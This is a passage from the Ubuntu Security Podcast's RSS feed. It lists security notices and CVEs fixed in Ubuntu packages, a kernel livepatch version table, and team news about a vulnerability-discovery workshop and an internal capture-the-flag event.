<li><a href="https://ubuntu.com/security/CVE-2023-44466">CVE-2023-44466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4134">CVE-2023-4134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4132">CVE-2023-4132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3867">CVE-2023-3867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3866">CVE-2023-3866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3865">CVE-2023-3865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38432">CVE-2023-38432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38430">CVE-2023-38430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3772">CVE-2023-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31083">CVE-2023-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="lsn-0099-1-linux-kernel-vulnerability--12-49">[<a href="https://ubuntu.com/security/notices/LSN-0099-1">LSN-0099-1</a>] Linux kernel vulnerability (12:49)</h3>
<ul>
<li>16 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5197">CVE-2023-5197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3567">CVE-2023-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>99.2</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-6.2</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>99.2</td>
          <td>99.1</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-6.2</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>99.2</td>
          <td>99.1</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-6.2</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>99.2</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>hwe-6.2</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>99.2</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>99.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>99.1</td>
          <td>99.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-6501-1-rabbitmq-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6501-1">USN-6501-1</a>] RabbitMQ vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46118">CVE-2023-46118</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6504-1-tracker-miners-vulnerability--13-30">[<a href="https://ubuntu.com/security/notices/USN-6504-1">USN-6504-1</a>] tracker-miners vulnerability (13:30)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5557">CVE-2023-5557</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Hardening of the seccomp sandbox in tracker</li>
<li><a href="/episode-211/#usn-6423-2-cue-vulnerability--07-04">[USN-6423-2] CUE vulnerability (07:04) from Episode 211</a> - libcue vuln from
Kevin Backhouse at Github exploited this weakness in the existing seccomp
sandbox to be able to mount their attack for that vulnerability</li>
<li>At the time I discussed how the tracker developers were deploying additional
hardening to ensure all threads used by tracker-miners were sandboxed - this
is that fix</li>
</ul>
<h3 id="usn-6505-1-nghttp2-vulnerability--15-20">[<a href="https://ubuntu.com/security/notices/USN-6505-1">USN-6505-1</a>] nghttp2 vulnerability (15:20)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44487">CVE-2023-44487</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-212/#usn-6438-1-usn-6438-2-usn-6427-2-dot-net-vulnerabilities--05-15">[USN-6438-1, USN-6438-2, USN-6427-2] .NET vulnerabilities from Episode 212</a></li>
<li>HTTP/2 Rapid Reset - affects multiple HTTP/2 implementations</li>
</ul>
<h3 id="usn-6506-1-apache-http-server-vulnerabilities--15-27">[<a href="https://ubuntu.com/security/notices/USN-6506-1">USN-6506-1</a>] Apache HTTP Server vulnerabilities (15:27)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45802">CVE-2023-45802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43622">CVE-2023-43622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31122">CVE-2023-31122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS against HTTP/2 implemtation - very similar to historical Slow Loris
attack - fixing required backporting the entire version of the http/2 module
from 2.0.10 back to earlier releases - thanks to Marc for this herculean
effort</li>
</ul>
<h3 id="usn-6507-1-glusterfs-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6507-1">USN-6507-1</a>] GlusterFS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48340">CVE-2022-48340</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6509-1-firefox-vulnerabilities--16-17">[<a href="https://ubuntu.com/security/notices/USN-6509-1">USN-6509-1</a>] Firefox vulnerabilities (16:17)</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6209">CVE-2023-6209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6208">CVE-2023-6208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6207">CVE-2023-6207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6205">CVE-2023-6205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6204">CVE-2023-6204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6213">CVE-2023-6213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6212">CVE-2023-6212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6211">CVE-2023-6211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6210">CVE-2023-6210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6206">CVE-2023-6206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>120.0</li>
<li>One issue specific to Linux when running under X11 (and I assume XWayland) -
when copying text using the Selection API, this would also be copied into the
primary selection (aka where stuff goes when you highlight it and then paste
it with middle mouse button)</li>
</ul>
<h3 id="usn-6508-1-usn-6508-2-poppler-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6508-1">USN-6508-1</a>, <a href="https://ubuntu.com/security/notices/USN-6508-2">USN-6508-2</a>] poppler vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38349">CVE-2022-38349</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37052">CVE-2022-37052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37051">CVE-2022-37051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37050">CVE-2022-37050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-23804">CVE-2020-23804</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6511-1-openzfs-vulnerability--17-21">[<a href="https://ubuntu.com/security/notices/USN-6511-1">USN-6511-1</a>] OpenZFS vulnerability (17:21)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2013-20001">CVE-2013-20001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Oldest CVE patched in a while - was originally reported to openzfs project
back in November 2013 - over 10 years ago</li>
<li>When sharing over IPv6 would expose to everyone, not just the intended IPv6
address but to everyone</li>
<li>Issue languished, eventually a CVE was assigned in Feb 2021 and then fixed in
October 2021</li>
</ul>
<h3 id="usn-6510-1-apache-http-server-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6510-1">USN-6510-1</a>] Apache HTTP Server vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31122">CVE-2023-31122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6512-1-libtiff-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6512-1">USN-6512-1</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3576">CVE-2023-3576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40090">CVE-2022-40090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6513-1-python-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6513-1">USN-6513-1</a>] Python vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40217">CVE-2023-40217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48564">CVE-2022-48564</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6514-1-open-vswitch-vulnerability--18-18">[<a href="https://ubuntu.com/security/notices/USN-6514-1">USN-6514-1</a>] Open vSwitch vulnerability (18:18)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5366">CVE-2023-5366</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly handle OpenFlow rules for ICMPv6 Neighbour Advertisements -
in some circumstances would match against the wrong rules and so could allow
an attacker who could load certain rules to then cause other traffic to be
redirected contrary to expectations - this would then result in an info leak</li>
</ul>
<h3 id="usn-6515-1-thunderbird-vulnerabilities--18-46">[<a href="https://ubuntu.com/security/notices/USN-6515-1">USN-6515-1</a>] Thunderbird vulnerabilities (18:46)</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6209">CVE-2023-6209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6208">CVE-2023-6208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6207">CVE-2023-6207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6205">CVE-2023-6205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6204">CVE-2023-6204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6212">CVE-2023-6212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6206">CVE-2023-6206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>115.5.0</li>
</ul>
<h3 id="usn-6517-1-perl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6517-1">USN-6517-1</a>] Perl vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-47038">CVE-2023-47038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48522">CVE-2022-48522</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6402-2-libtommath-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6402-2">USN-6402-2</a>] LibTomMath vulnerability</h3>
<ul>
<li>1 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36328">CVE-2023-36328</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6513-2-python-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6513-2">USN-6513-2</a>] Python vulnerability</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40217">CVE-2023-40217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48564">CVE-2022-48564</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6518-1-afflib-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6518-1">USN-6518-1</a>] AFFLIB vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8050">CVE-2018-8050</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6519-1-ec2-hibagent-update">[<a href="https://ubuntu.com/security/notices/USN-6519-1">USN-6519-1</a>] EC2 hibagent update</h3>
<ul>
<li>Affecting Bionic ESM (18.04 ESM)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E214.mp3" length="21614725" type="audio/mpeg" /><itunes:duration>1210</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 213
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-213/</link>
          <pubDate>Fri, 17 Nov 2023 16:59:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>acd3fb1a5d192f6a10536faa9017e11410bc0af3959b5568869ca13405bd30fa27dee0da6a59f179ed5f75202fb94c0d4c98b895e074382722e9b06c1cdb13d2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 213</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          As we ease back into regular programming, we cover the various activities the
  team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit
  and Ubuntu Engineering Sprint.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  As we ease back into regular programming, we cover the various activities the
  team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit
  and Ubuntu Engineering Sprint.
  </itunes:summary>
        <description>  As we ease back into regular programming, we cover the various activities the
  team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit
  and Ubuntu Engineering Sprint.
  </description>
        <googleplay:description>  As we ease back into regular programming, we cover the various activities the
  team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit
  and Ubuntu Engineering Sprint.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>As we ease back into regular programming, we cover the various activities the
team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit
and Ubuntu Engineering Sprint.</p>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-security-team-at-the-ubuntu-summit--00-48">Ubuntu Security team at the Ubuntu Summit (00:48)</h3>
<ul>
<li><a href="/episode-212/#preparation-for-riga-product-roadmap-sprint-ubuntu-summit-and-engineering-sprint--17-33">Preparation for Riga Product Roadmap Sprint, Ubuntu Summit and Engineering Sprint from Episode 212</a></li>
<li>In the last episode we previewed a couple talks by different folks from the
Ubuntu Security Team - recordings for these will be available but currently
there is only the livestreams from the main plenary room - as such, right now
you can go watch Tobias&rsquo; talk &ldquo;From Asahi Linux to Ubuntu: Running Linux on
Apple Silicon&rdquo;
<ul>
<li><a href="https://youtu.be/XIGxKyekvBQ?list=PL-qBHd6_LXWZqbxr3542fZs_IMn0gAb2B&amp;t=20272">https://youtu.be/XIGxKyekvBQ?list=PL-qBHd6_LXWZqbxr3542fZs_IMn0gAb2B&amp;t=20272</a></li>
</ul>
</li>
</ul>
<h3 id="andrei-publishes-the-open-source-fortress--01-41">Andrei publishes The Open Source Fortress (01:41)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/the-open-source-fortress-is-now-live/40183">https://discourse.ubuntu.com/t/the-open-source-fortress-is-now-live/40183</a></li>
<li>Back in August, Andrei put out a call for topic suggestions for a
vulnerability discovery workshop that he was putting together, with a
particular focus on open source code bases</li>
<li>He presented this in a 90 minute session 2 weeks ago on the final day of the
Ubuntu Summit</li>
<li>He covered a number of topics with a focus on practical application of each
using dedicated tooling, e.g.:
<ul>
<li>Threat modelling with OWASP Threat Dragon</li>
<li>Secret scanning with Gitleaks</li>
<li>Dependency scanning with OSV-Scanner</li>
<li>Linting with Bandit and flawfinder</li>
<li>Code querying with Semgrep</li>
<li>Fuzzing with AFL++</li>
<li>Symbolic execution with KLEE</li>
</ul>
</li>
<li>So not only did participants learn about a given technique, such as what
fuzzing is etc, but also how they can easily apply it with standard tooling to
find real world problems</li>
<li>Due to the success of the workshop, he has decided to make the contents
publicly available
<ul>
<li>Online wiki <a href="https://ossfortress.io/">https://ossfortress.io/</a></li>
<li><a href="https://github.com/iosifache/oss_fortress/blob/main/presentation/ubuntu-summit-23/export.pdf">Presentation from the Summit</a></li>
<li><a href="https://github.com/iosifache/oss_fortress">Github repository</a> with example projects to run the various tools against</li>
<li>Pre-built docker images for the various tools used in the workshop</li>
</ul>
</li>
<li>Designed to be worked through in your own time</li>
</ul>
<h3 id="ubuctf-at-the-ubuntu-engineering-sprint--04-15">UbuCTF at the Ubuntu Engineering Sprint (04:15)</h3>
<ul>
<li>Emi, Nishit, Andei, Amir and David from the team organised and held the first
UbuCTF at the Engineering Sprint the week after the Ubuntu Summit</li>
<li>Organised around a story of cyber crime fighting against a criminal gang in Riga</li>
<li>5 days, 26 challenges, 64 players</li>
<li>Challenges covered a variety of topics
<ul>
<li>Networking</li>
<li>Web</li>
<li>Crypto(graphy)</li>
<li>Reverse engineering</li>
<li>Pwning</li>
<li>Vulnerability Patching</li>
</ul>
</li>
<li>Gave experience using tools like <a href="https://github.com/xmendez/wfuzz">Wfuzz</a>, <a href="https://github.com/Gallopsled/pwntools">Pwntools</a>, <a href="https://cutter.re/">cutter</a> / <a href="https://rizin.re/">rizin</a> / <a href="https://snapcraft.io/radare2">radare2</a>,
<a href="https://snapcraft.io/ghidra">Ghidra</a>, <a href="https://www.wireshark.org/">Wireshark</a>, <a href="https://snapcraft.io/insomnia">insomnia</a> and more</li>
<li>457 flags submitted (110 correct), 47 patches submitted</li>
<li>Result was very close - won by Anton Troyanov (Senior Engineer on the MAAS team)</li>
<li>Ubuntu Security team members were barred from competing as we had previously
worked on these challenges - BUT shout out to Sudhakar Verma who just joined
our team only 4 weeks ago and so didn&rsquo;t have any prior experience with this
CTF - managed to solve every single challenge 💪💪💪</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E213.mp3" length="9454333" type="audio/mpeg" /><itunes:duration>549</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 212
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-212/</link>
          <pubDate>Fri, 27 Oct 2023 17:17:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b9f124891c17e7d652b7b94fae7a87dd0cb6be867565f08732a23ffad217536db19c9b79a575d0c8b27f2b5919704db113f2b2dfd4fc98c0233e82a5360e32f6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 212</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          With the Ubuntu Summit just around the corner, we preview a couple talks by the
  Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP,
  AOM, ncurses, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  With the Ubuntu Summit just around the corner, we preview a couple talks by the
  Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP,
  AOM, ncurses, the Linux kernel and more.
  </itunes:summary>
        <description>  With the Ubuntu Summit just around the corner, we preview a couple talks by the
  Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP,
  AOM, ncurses, the Linux kernel and more.
  </description>
        <googleplay:description>  With the Ubuntu Summit just around the corner, we preview a couple talks by the
  Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP,
  AOM, ncurses, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>With the Ubuntu Summit just around the corner, we preview a couple talks by the
Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP,
AOM, ncurses, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>91 unique CVEs addressed</p>
